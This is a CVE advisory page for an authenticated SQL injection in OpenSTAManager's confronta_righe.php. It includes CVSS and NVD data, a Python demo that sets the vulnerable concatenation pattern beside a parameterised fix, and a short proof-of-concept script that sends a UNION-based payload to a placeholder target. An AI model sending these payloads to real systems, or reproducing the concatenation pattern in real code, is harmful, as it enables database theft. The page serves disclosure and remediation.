Security Vulnerability Report
CVE-2026-35470 CVSS 8.8 HIGH

Published: 2026-04-06 18:16:44
Last Modified: 2026-04-14 19:58:02

Description

OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2.
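To make the defect concrete, here is an added example that is not OpenSTAManager's code and not the advisory's PoC: the concatenation pattern the description names, reproduced beside a hardened handler, in Python against an in-memory SQLite database so it runs offline. The table names, the query shape (an IN (...) list of row ids) and the assumption that `righe` carries comma-separated integer ids are all assumptions made for the illustration; the real application's schema, query and database engine are not reproduced.

```python
import sqlite3

# Constructed in-memory schema for the demonstration only; the real
# OpenSTAManager tables are not reproduced here.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE righe (id INTEGER PRIMARY KEY, descrizione TEXT, prezzo REAL);
        INSERT INTO righe VALUES (1, 'Intervento tecnico', 80.0);
        INSERT INTO righe VALUES (2, 'Ricambio scheda', 25.5);
        CREATE TABLE utenti (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO utenti VALUES (1, 'admin', '$2y$10$constructedhash');
    """)
    return conn


def fetch_rows_vulnerable(conn, righe):
    """Reproduces the pattern the advisory describes: the raw request value is
    concatenated straight into the SQL text. The IN (...) shape is an assumption."""
    query = "SELECT id, descrizione, prezzo FROM righe WHERE id IN (" + righe + ")"
    return conn.execute(query).fetchall()


def parse_righe(righe):
    """Assumed contract: 'righe' is a comma-separated list of integer row ids.
    Anything else is rejected before it gets near the database."""
    ids = []
    for part in righe.split(","):
        part = part.strip()
        # isascii() guards against Unicode digits that isdigit() would accept.
        if not (part.isascii() and part.isdigit()):
            raise ValueError(f"invalid row id: {part!r}")
        ids.append(int(part))
    if not ids:
        raise ValueError("no row ids supplied")
    return ids


def fetch_rows_fixed(conn, righe):
    """Hardened form: validate, then bind one placeholder per id, so the SQL
    text never contains attacker-controlled characters."""
    ids = parse_righe(righe)
    placeholders = ",".join("?" for _ in ids)
    query = f"SELECT id, descrizione, prezzo FROM righe WHERE id IN ({placeholders})"
    return conn.execute(query, ids).fetchall()


# Payload in the style of the PoC on this page: close the IN list, UNION in a
# query against a table the endpoint was never meant to read, comment out the
# rest. The leading "1)" matches the assumed IN (...) shape of this demo.
PAYLOAD = "1) UNION SELECT id, username, password FROM utenti-- -"


def demo():
    conn = build_db()
    leaked = fetch_rows_vulnerable(conn, PAYLOAD)
    legit = fetch_rows_fixed(conn, "1, 2")   # benign input still works
    try:
        fetch_rows_fixed(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, legit, blocked


if __name__ == "__main__":
    leaked, legit, blocked = demo()
    print("vulnerable handler returned:", leaked)
    print("fixed handler, benign input:", legit)
    print("fixed handler rejected payload:", blocked)
```

The vulnerable handler returns the `utenti` row alongside the legitimate `righe` row, which is exactly the credential exposure the description warns about; the hardened handler rejects the payload at validation and, even for values that pass validation, passes them to the driver as bound parameters rather than as SQL text.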

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:* - VULNERABLE
OpenSTAManager < 2.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-35470
# Demonstrates SQL Injection in OpenSTAManager < 2.10.2
import requests

# confronta_righe.php exists in several modules; point this at the copy
# belonging to the module under test.
target_url = "http://target-ip/openstamanager/confronta_righe.php"

# Authentication is required (PR:L): supply a valid session cookie.
cookies = {
    "PHPSESSID": "valid_session_id_here"
}

# Vulnerable parameter: righe
# Payload attempts to extract the database version via UNION-based SQL injection.
# The column count (5 here) must match the original query's SELECT list, so it
# may need adjusting before the UNION succeeds.
payload = "1 UNION SELECT 1,2,version(),4,5-- -"
params = {
    "righe": payload
}

try:
    response = requests.get(target_url, params=params, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check response content for SQL errors or leaked data.")
        print(response.text[:500])
except requests.RequestException as e:
    print(f"[-] Error: {e}")
```

References

https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2 (Product, Release Notes)
https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39 (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35470",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-06T18:16:44.400",
    "lastModified": "2026-04-14T19:58:01.767",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.10.2",
                "matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```